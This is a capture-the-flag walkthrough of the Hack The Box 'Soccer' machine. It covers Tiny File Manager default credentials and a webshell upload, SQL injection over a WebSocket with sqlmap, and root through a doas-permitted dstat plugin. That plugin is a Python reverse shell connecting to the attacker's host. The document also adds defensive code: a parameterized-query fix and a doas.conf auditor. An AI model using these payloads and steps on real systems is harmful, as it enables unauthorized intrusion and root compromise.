Soccer Machine (HTB)

Information gathering

```
┌──(i3eg1nner㉿minilite)-[~/Downloads/Soccer]
└─$ sudo nmap --min-rate 10000 -p- 10.10.11.194
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-06 09:22 EDT
Warning: 10.10.11.194 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.11.194
Host is up (0.058s latency).
Not shown: 64759 closed tcp ports (reset), 773 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
9091/tcp open xmltec-xmlmail

Nmap done: 1 IP address (1 host up) scanned in 28.92 seconds
```
```
┌──(i3eg1nner㉿minilite)-[~/Downloads/Soccer]
└─$ sudo nmap -sT -sV -sC -p22,80,9091 10.10.11.194
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-06 09:24 EDT
Nmap scan report for 10.10.11.194
Host is up (0.0038s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 ad0d84a3fdcc98a478fef94915dae16d (RSA)
| 256 dfd6a39f68269dfc7c6a0c29e961f00c (ECDSA)
|_ 256 5797565def793c2fcbdb35fff17c615c (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://soccer.htb/
9091/tcp open xmltec-xmlmail?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, Help, RPCCheck, SSLSessionReq, drda, informix:
| HTTP/1.1 400 Bad Request
| Connection: close
| GetRequest:
| HTTP/1.1 404 Not Found
| Content-Security-Policy: default-src 'none'
| X-Content-Type-Options: nosniff
| Content-Type: text/html; charset=utf-8
| Content-Length: 139
| Date: Tue, 06 Jun 2023 13:24:56 GMT
| Connection: close
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <meta charset="utf-8">
| <title>Error</title>
| </head>
| <body>
| <pre>Cannot GET /</pre>
| </body>
| </html>
| HTTPOptions, RTSPRequest:
| HTTP/1.1 404 Not Found
| Content-Security-Policy: default-src 'none'
| X-Content-Type-Options: nosniff
| Content-Type: text/html; charset=utf-8
| Content-Length: 143
| Date: Tue, 06 Jun 2023 13:24:56 GMT
| Connection: close
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <meta charset="utf-8">
| <title>Error</title>
| </head>
| <body>
| <pre>Cannot OPTIONS /</pre>
| </body>
|_ </html>
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.61 seconds
```

```
┌──(i3eg1nner㉿minilite)-[~/Downloads/Soccer]
└─$ sudo nmap --script=vuln -p22,80,9091 10.10.11.194
[sudo] password for i3eg1nner:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-06 09:49 EDT
Nmap scan report for soccer.htb (10.10.11.194)
Host is up (0.0039s latency).

PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-vuln-cve2011-3192:
| VULNERABLE:
| Apache byterange filter DoS
| State: VULNERABLE
| IDs: BID:49303 CVE:CVE-2011-3192
| The Apache web server is vulnerable to a denial of service attack when numerous
| overlapping byte ranges are requested.
| Disclosure date: 2011-08-19
| References:
| https://seclists.org/fulldisclosure/2011/Aug/175
| https://www.securityfocus.com/bid/49303
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192
|_ https://www.tenable.com/plugins/nessus/55976
|_http-csrf: Couldn't find any CSRF vulnerabilities.
9091/tcp open xmltec-xmlmail

Nmap done: 1 IP address (1 host up) scanned in 76.65 seconds
```

Summarising what we have so far: three open ports, most likely a Linux operating system, and no obvious vulnerabilities (the CVE-2011-3192 hit is an Apache byte-range check, while the server on port 80 identifies itself as nginx).

Accessing the web interface

Visiting the site automatically redirects to soccer.htb, so we add a mapping in /etc/hosts to make the page load normally. Reading the page source, clicking around, and basic information gathering turn up nothing, so on to directory brute-forcing.

```
┌──(i3eg1nner㉿minilite)-[~/Downloads/Soccer]
└─$ sudo gobuster dir -u http://soccer.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://soccer.htb
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Timeout: 10s
===============================================================
2023/06/06 09:55:03 Starting gobuster in directory enumeration mode
===============================================================
/tiny (Status: 301) [Size: 178] [--> http://soccer.htb/tiny/]
Progress: 219896 / 220561 (99.70%)
===============================================================
2023/06/06 09:56:35 Finished
===============================================================
```

Tiny File Manager 2.4.3 vulnerability

Visiting it reveals a file management system called Tiny File Manager, and the page source shows the version number 2.4.3. A quick Google search follows.

GitHub yielded two scripts. The sh script broke when run, and the Python script ran but did not achieve the expected result (the site restricts write permissions). Notably, the usage instructions say an administrator account and password are required, and the example given uses the default username and password; trying them shows that the default credentials do log in. Running the script produced the following error:

```
┌──(i3eg1nner㉿minilite)-[~/Downloads/Soccer]
└─$ python tiny_file_manager_exploit.py http://soccer.htb/tiny/tinyfilemanager.php admin "admin@123"


CVE-2021-45010: Tiny File Manager <= 2.4.3 Authenticated RCE Exploit.

Vulnerability discovered by Febin

Exploit Author: FEBIN

[+] Leak in the webroot direcory path to upload shell.
[+] WEBROOT found: /var/www/html/tiny
[+] Trying to upload pwn_1480535420723339776.php to /var/www/html/tiny directory...
{"status":"error","info":"The specified folder for upload isn't writeable."}
[-] No Success response. Files does not seem to be uploaded successfully.
Exiting...
Exited.
```

The address structure looks fine, and the file the script uploads is a one-line webshell, so let's try uploading manually. The upload reports that the tiny directory is not writable, so try the uploads subdirectory one level down instead; that upload succeeds.

```
http://soccer.htb/tiny/uploads/<your-shell-name>
```

Getting a shell

Start a listener beforehand, then visit the path above to receive the reverse shell.

```
┌──(i3eg1nner㉿minilite)-[~/Downloads/Soccer]
└─$ sudo nc -lvnp 1234
[sudo] password for i3eg1nner:
listening on [any] 1234 ...
connect to [10.10.14.145] from (UNKNOWN) [10.10.11.194] 34534
Linux soccer 5.4.0-135-generic #152-Ubuntu SMP Wed Nov 23 20:19:22 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
15:41:04 up 4:06, 0 users, load average: 0.00, 0.02, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ uname -a
Linux soccer 5.4.0-135-generic #152-Ubuntu SMP Wed Nov 23 20:19:22 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:b9:5e:b1 brd ff:ff:ff:ff:ff:ff
inet 10.10.11.194/23 brd 10.10.11.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::250:56ff:feb9:5eb1/64 scope link
valid_lft forever preferred_lft forever
$ which python
$ which python2
$ which python3
/usr/bin/python3
$ python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@soccer:/$ sudo -l
sudo -l
[sudo] password for www-data:

Sorry, try again.
[sudo] password for www-data: admin@123

Sorry, try again.
[sudo] password for www-data: 12345

sudo: 3 incorrect password attempts
```

Information gathering on the box: user.txt is found under /home/player but is not readable. Cron jobs, home directories, environment variables, and ps show nothing exploitable, but among the SUID files there is an unusual one: doas.

```
www-data@soccer:/$ find / -type f -perm -u=s 2>/dev/null
find / -type f -perm -u=s 2>/dev/null
/usr/local/bin/doas
/usr/lib/snapd/snap-confine
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/bin/umount
/usr/bin/fusermount
/usr/bin/mount
/usr/bin/su
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/at
/snap/snapd/17883/usr/lib/snapd/snap-confine
/snap/core20/1695/usr/bin/chfn
/snap/core20/1695/usr/bin/chsh
/snap/core20/1695/usr/bin/gpasswd
/snap/core20/1695/usr/bin/mount
/snap/core20/1695/usr/bin/newgrp
/snap/core20/1695/usr/bin/passwd
/snap/core20/1695/usr/bin/su
/snap/core20/1695/usr/bin/sudo
/snap/core20/1695/usr/bin/umount
/snap/core20/1695/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core20/1695/usr/lib/openssh/ssh-keysign
```

After some Googling on doas:

```
www-data@soccer:/$ cat /etc/doas.conf
cat /etc/doas.conf
cat: /etc/doas.conf: No such file or directory
www-data@soccer:/$ doas -h
doas -h
doas: invalid option -- 'h'
usage: doas [-nSs] [-a style] [-C config] [-u user] command [args]
www-data@soccer:/$ find / -name doas.conf 2>/dev/null
find / -name doas.conf 2>/dev/null
/usr/local/etc/doas.conf
www-data@soccer:/$ cat /usr/local/etc/doas.conf
cat /usr/local/etc/doas.conf
permit nopass player as root cmd /usr/bin/dstat
```

The conf file gives the hint: the player user may run /usr/bin/dstat as root without a password. The next problem is how to become player.

Subdomain information

At first I thought the password might be written in a config file, but repeated information gathering came up empty, so I glanced at a write-up. This step was new to me: look at /etc/nginx/sites-enabled. You could also start from netstat -lntp and first check which local TCP ports are listening.

Some listening ports turn up whose PIDs we have no permission to view, so let's look in the nginx directory.

```
www-data@soccer:/etc/nginx$ cd sites-enabled
cd sites-enabled
www-data@soccer:/etc/nginx/sites-enabled$ ls -liah
ls -liah
total 8.0K
259074 drwxr-xr-x 2 root root 4.0K Dec 1 2022 .
259060 drwxr-xr-x 8 root root 4.0K Nov 17 2022 ..
256059 lrwxrwxrwx 1 root root 34 Nov 17 2022 default -> /etc/nginx/sites-available/default
262572 lrwxrwxrwx 1 root root 41 Nov 17 2022 soc-player.htb -> /etc/nginx/sites-available/soc-player.htb
www-data@soccer:/etc/nginx/sites-enabled$ cat /etc/nginx/sites-available/soc-player.htb
<bled$ cat /etc/nginx/sites-available/soc-player.htb
server {
    listen 80;
    listen [::]:80;

    server_name soc-player.soccer.htb;

    root /root/app/views;

    location / {
        proxy_pass http://localhost:3000;
        proxy_http_version 1.1;
        proxy_set_header Upgrade $http_upgrade;
        proxy_set_header Connection 'upgrade';
        proxy_set_header Host $host;
        proxy_cache_bypass $http_upgrade;
    }

}
```

This is where the subdomain comes from. Edit the hosts file again to add a mapping for the subdomain, then visit it: the main page is the same as on the main domain, but login and registration options have been added. Register first, then log in (testing for SQL injection along the way). After logging in there is only a search box, so SQL injection is fairly likely. Entering your own ticket id reports that it exists, while an arbitrary value reports that it does not. Trying and 1=1 and and 1=0 shows that the appended condition is executed, which confirms SQL injection.

Still, look at the page source first, because the important find is hidden there. If you use Burp Suite, the site map under Target also shows a port 9091.

The response indicates an upgrade to WebSocket. Back in the Proxy tab there is a WebSocket sub-tab, where our query content can be seen in the frames.

```javascript
var ws = new WebSocket("ws://soc-player.soccer.htb:9091");
window.onload = function () {

    var btn = document.getElementById('btn');
    var input = document.getElementById('id');

    ws.onopen = function (e) {
        console.log('connected to the server')
    }
    input.addEventListener('keypress', (e) => {
        keyOne(e)
    });

    function keyOne(e) {
        e.stopPropagation();
        if (e.keyCode === 13) {
            e.preventDefault();
            sendText();
        }
    }

    function sendText() {
        var msg = input.value;
        if (msg.length > 0) {
            ws.send(JSON.stringify({
                "id": msg
            }))
        }
        else append("????????")
    }
}

ws.onmessage = function (e) {
    append(e.data)
}

function append(msg) {
    let p = document.querySelector("p");
    // let randomColor = '#' + Math.floor(Math.random() * 16777215).toString(16);
    // p.style.color = randomColor;
    p.textContent = msg
}
```

This is the code embedded in the page: the search box value is sent as the "id" field of a JSON frame over the WebSocket. With the help of a search engine, we consider how to turn this into something more convenient to work with.

The code we need can be found in the first result; modify its key parts (the WebSocket URL and the JSON payload).

Enumerating with SQLMap

Chaining a WebSocket proxy script with SQLMap

Run this Python file locally (it exposes the WebSocket as a local HTTP endpoint on port 8081) and open another terminal to run sqlmap against it.

```
┌──(i3eg1nner㉿minilite)-[~]
└─$ sqlmap -u "http://localhost:8081/?id=1" -p "id" --tables
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.7.2#stable}
|_ -| . [)]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 12:43:22 /2023-06-06/

[12:43:22] [INFO] resuming back-end DBMS 'mysql'
[12:43:22] [INFO] testing connection to the target URL
[12:43:22] [WARNING] turning off pre-connect mechanism because of incompatible server ('SimpleHTTP/0.6 Python/3.11.2')
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1 AND (SELECT 8273 FROM (SELECT(SLEEP(5)))cpyj)
---
[12:43:22] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[12:43:22] [INFO] fetching database names
[12:43:22] [INFO] fetching number of databases
[12:43:22] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
[12:43:30] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
5
[12:43:36] [INFO] retrieved:
[12:43:41] [INFO] adjusting time delay to 1 second due to good response times
mysql
[12:43:56] [INFO] retrieved: information_schema
[12:44:57] [INFO] retrieved: performance_schema
[12:45:55] [INFO] retrieved: sys
[12:46:05] [INFO] retrieved: soccer_db
[12:46:36] [INFO] fetching tables for databases: 'information_schema, mysql, performance_schema, soccer_db, sys'
[12:46:36] [INFO] fetching number of tables for database 'information_schema'
[12:46:36] [INFO] retrieved: 79
[12:46:41] [INFO] retrieved: ADMINISTRABLE_ROLE_AUTHORIZATIONS
[12:48:28] [INFO] retrieved: AP^C
```

This was far too slow (time-based blind only, one character per SLEEP), so I went straight to the write-up.

```
┌──(i3eg1nner㉿minilite)-[~]
└─$ sqlmap -u "http://localhost:8081/?id=1" -p "id" -T accounts --columns
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.7.2#stable}
|_ -| . [.]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 12:51:24 /2023-06-06/

[12:51:25] [INFO] resuming back-end DBMS 'mysql'
[12:51:25] [INFO] testing connection to the target URL
[12:51:55] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s)
[12:51:55] [WARNING] if the problem persists please check that the provided target URL is reachable. In case that it is, you can try to rerun with switch '--random-agent' and/or proxy switches ('--proxy', '--proxy-file'...)
[12:51:55] [WARNING] turning off pre-connect mechanism because of incompatible server ('SimpleHTTP/0.6 Python/3.11.2')
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1 AND (SELECT 8273 FROM (SELECT(SLEEP(5)))cpyj)
---
[12:51:55] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[12:51:55] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) columns
[12:51:55] [INFO] fetching current database
[12:51:55] [INFO] resumed: soccer_db
[12:51:55] [INFO] fetching columns for table 'accounts' in database 'soccer_db'
[12:51:55] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
[12:52:02] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
4
[12:52:02] [INFO] retrieved:
[12:52:12] [INFO] adjusting time delay to 1 second due to good response times
email
[12:52:24] [INFO] retrieved: varchar(40)
[12:53:00] [INFO] retrieved: id
[12:53:07] [INFO] retrieved: int
[12:53:18] [INFO] retrieved: password
[12:53:47] [INFO] retrieved: va^C
```

I checked the write-up again and took the username and password straight from it; I still need to go back and note sqlmap's parameters properly. The result:

```
Username: player
Password: PlayerOftheMatch2022
```

Next, log in over SSH with these credentials; it succeeds.

Using SQLMap directly against the WebSocket

In fact SQLMap can inject into a WebSocket endpoint directly, using the information captured in Burp Suite. Note that if the id here is chosen arbitrarily, SQLMap only finds time-based blind injection, which is also why the earlier run was so slow; using a valid id lets it see the boolean difference between existing and non-existing tickets.

```
sqlmap -u ws://soc-player.soccer.htb:9091 --data='{"id":"4354"}' --batch
```

The output confirms that injection is present, both boolean-based blind and time-based blind.
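The boolean-blind behaviour comes from the ticket id being concatenated into the SQL statement on the server. The Python below is an added example and not the soccer.htb application's code (the Node service behind port 9091 is not shown on the page): it rebuilds the lookup against an in-memory SQLite table that borrows the `accounts` table name and the id/email/password columns from the sqlmap output, with constructed rows, and places the concatenating handler beside a hardened one that validates the id as a plain integer and binds it as a query parameter. The query shape and the response strings are assumptions.

```python
"""Ticket lookup behind a WebSocket endpoint, rebuilt two ways (added example)."""
import json
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for soccer_db: table and column names
    follow the sqlmap output, the rows are made up."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE accounts (id INTEGER PRIMARY KEY, email TEXT, password TEXT)")
    con.executemany("INSERT INTO accounts VALUES (?, ?, ?)",
                    [(4354, "player@example.com", "<constructed>"),
                     (90001, "second@example.com", "<constructed>")])
    return con


def lookup_unsafe(con: sqlite3.Connection, frame: str) -> str:
    """Vulnerable pattern: the 'id' string from the JSON frame is pasted into
    the statement, so an appended 'AND 1=1' / 'AND 1=0' flips the answer."""
    ticket_id = json.loads(frame)["id"]
    sql = f"SELECT id FROM accounts WHERE id = {ticket_id}"
    try:
        rows = con.execute(sql).fetchall()
    except sqlite3.Error:
        return "Ticket Doesn't Exist"   # a DB error is just as observable to the client
    return "Ticket Exists" if rows else "Ticket Doesn't Exist"


def lookup_safe(con: sqlite3.Connection, frame: str) -> str:
    """Hardened handler: reject anything that is not a plain non-negative
    integer, then bind it as a parameter so the DBMS never parses it as SQL."""
    try:
        raw = json.loads(frame)["id"]
    except (ValueError, KeyError, TypeError):
        return "invalid request"
    if isinstance(raw, bool) or not isinstance(raw, (int, str)):
        return "invalid request"       # bool is an int subclass in Python, so exclude it first
    text = str(raw).strip()
    if not text.isdigit():
        return "invalid request"       # '4354 AND 1=1' stops here
    rows = con.execute("SELECT id FROM accounts WHERE id = ?", (int(text),)).fetchall()
    return "Ticket Exists" if rows else "Ticket Doesn't Exist"


def compare(frames) -> dict:
    """Run the same JSON frames through both handlers; returns frame -> (unsafe, safe)."""
    con = make_db()
    return {f: (lookup_unsafe(con, f), lookup_safe(con, f)) for f in frames}


if __name__ == "__main__":
    probes = ['{"id":"4354"}', '{"id":"4354 AND 1=1"}', '{"id":"4354 AND 1=0"}']
    for frame, (unsafe, safe) in compare(probes).items():
        print(f"{frame:<24} unsafe={unsafe:<22} safe={safe}")
```

Under the concatenating handler the two probe frames from the write-up give different answers, which is exactly the oracle boolean-blind tooling needs; under the hardened handler both are refused before any query runs, and a valid id still behaves as before. On MySQL the same fix is a prepared statement with a `?` placeholder; the validation step is what also removes the time-based channel, since no attacker-controlled text reaches the parser at all.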

Next use --current-db to get the database name; what follows is the classic routine. Since this is a review of someone else's video to fill my own gaps, I will not spell out every step.

Privilege escalation

For privilege escalation the approach was identified earlier: the doas rule runs dstat as root. dstat is a system resource monitoring tool, similar to top -n. Googling dstat gives the following, but the command shown in the picture errors out when run; HTB has probably restricted it, otherwise everyone who searched for SUID files would get root straight away. A reverse-shell plugin succeeded instead. Reference: Doas Privilege Escalation | Exploit Notes (hdks.org)

Looking at the hint in the conf file again:

```
www-data@soccer:/$ cat /usr/local/etc/doas.conf
cat /usr/local/etc/doas.conf
permit nopass player as root cmd /usr/bin/dstat
```

Create a file named dstat_exploit.py in /usr/local/share/dstat. dstat loads its plugins from these two locations: /usr/share/dstat/ and /usr/local/share/dstat/. A plugin file named dstat_<name>.py is imported when dstat is run with --<name>.

```python
# dstat_exploit.py: loaded by "dstat --exploit" and therefore executed as root via doas
import socket, subprocess, os

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("<your-IP>", 2929))   # listener address and port on the attacking host

# tie stdin, stdout and stderr to the socket
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)

import pty
pty.spawn("/bin/sh")
```

Run the command:

```
player@soccer:/usr/local/share/dstat$ doas -u root /usr/bin/dstat --exploit
/usr/bin/dstat:2619: DeprecationWarning: the imp module is deprecated in favour of importlib; see the module's documentation for alternative uses
import imp
```
```
┌──(i3eg1nner㉿minilite)-[~]
└─$ sudo nc -lvnp 1234
[sudo] password for i3eg1nner:
listening on [any] 1234 ...
connect to [10.10.14.145] from (UNKNOWN) [10.10.11.194] 59294
# whoami
whoami
root
# id
id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt
cat /root/root.txt

# cat /home/player/user.txt
cat /home/player/user.txt
```
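The root path above rests on one doas rule: a passwordless command that loads plugin code from a directory the permitted user can write to. As an added example, not from the write-up or from the doas project, the Python below parses doas.conf rules in the form `permit|deny [options] identity [as target] [cmd command [args ...]]` and flags permit rules that either allow any command or allow a command whose plugin directories are writable by the permitted identity. The command-to-plugin-directory map holds only dstat, with the two paths named earlier; the writability check reads owner/group/other mode bits only (no ACLs), treats group identities such as `:wheel` as unresolvable, and can be swapped out for testing.

```python
"""Audit doas.conf for rules whose target command loads user-writable plugins (added example)."""
import grp
import os
import pwd
import shlex
import stat

# Commands known to import code from a search path. The dstat paths are the two
# given in the write-up; extend this map for other plugin-driven tools (assumption).
PLUGIN_DIRS = {
    "/usr/bin/dstat": ["/usr/share/dstat", "/usr/local/share/dstat"],
}
OPTION_WORDS = ("nopass", "nolog", "persist", "keepenv")


def parse_doas_rules(conf_text: str) -> list:
    """Parse doas.conf into dicts: action, options, identity, target, cmd, args."""
    rules = []
    for raw in conf_text.splitlines():
        line = raw.split("#", 1)[0].strip()          # drop comments and blank lines
        if not line:
            continue
        tokens = shlex.split(line)
        if tokens[0] not in ("permit", "deny"):
            continue
        rule = {"action": tokens[0], "options": [], "identity": None,
                "target": None, "cmd": None, "args": None}
        i = 1
        while i < len(tokens):                        # options may appear in any order
            if tokens[i] in OPTION_WORDS:
                rule["options"].append(tokens[i])
                i += 1
            elif tokens[i] == "setenv":
                rule["options"].append("setenv")
                i = tokens.index("}", i) + 1          # skip "{ VAR=value ... }" (ValueError if unclosed)
            else:
                break
        if i < len(tokens):
            rule["identity"] = tokens[i]
            i += 1
        if i + 1 < len(tokens) and tokens[i] == "as":
            rule["target"] = tokens[i + 1]
            i += 2
        if i + 1 < len(tokens) and tokens[i] == "cmd":
            rule["cmd"] = tokens[i + 1]
            i += 2
        if i < len(tokens) and tokens[i] == "args":
            rule["args"] = tokens[i + 1:]
        rules.append(rule)
    return rules


def writable_by(path: str, user: str) -> bool:
    """True if `user` can create files in directory `path`, judged from mode bits only."""
    try:
        st = os.stat(path)
        pw = pwd.getpwnam(user)                       # group identities (":wheel") raise KeyError
    except (FileNotFoundError, KeyError):
        return False
    if pw.pw_uid == 0:
        return True
    groups = {g.gr_gid for g in grp.getgrall() if user in g.gr_mem} | {pw.pw_gid}
    if st.st_uid == pw.pw_uid:
        return bool(st.st_mode & stat.S_IWUSR)
    if st.st_gid in groups:
        return bool(st.st_mode & stat.S_IWGRP)
    return bool(st.st_mode & stat.S_IWOTH)


def audit(conf_text: str, plugin_dirs=PLUGIN_DIRS, is_writable=writable_by) -> list:
    """Return one finding string per risky permit rule."""
    findings = []
    for r in parse_doas_rules(conf_text):
        if r["action"] != "permit":
            continue
        who, target = r["identity"], r["target"] or "root"
        auth = "without a password" if "nopass" in r["options"] else "with a password"
        if r["cmd"] is None:
            findings.append(f"{who} may run ANY command as {target} {auth}")
            continue
        for d in plugin_dirs.get(r["cmd"], []):
            if is_writable(d, who):
                findings.append(f"{who} may run {r['cmd']} as {target} {auth} "
                                f"and can write its plugin directory {d}")
    return findings


if __name__ == "__main__":
    for path in ("/usr/local/etc/doas.conf", "/etc/doas.conf"):   # the two locations tried above
        if os.path.exists(path):
            with open(path) as fh:
                for finding in audit(fh.read()):
                    print(f"[!] {path}: {finding}")
```

Run as root on the host it reports the Soccer rule only when /usr/local/share/dstat is actually writable by player, which is the condition the escalation depended on; the corresponding hardening is to make those directories root-owned and 0755, or to drop the rule. The parser is also the piece to reuse for a broader policy review, for example listing every `nopass` rule regardless of command.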


Source: https://i3eg1nner.github.io/2023/06/3f1f96829489.html
Author: I3eg1nner
Published: 7 June 2023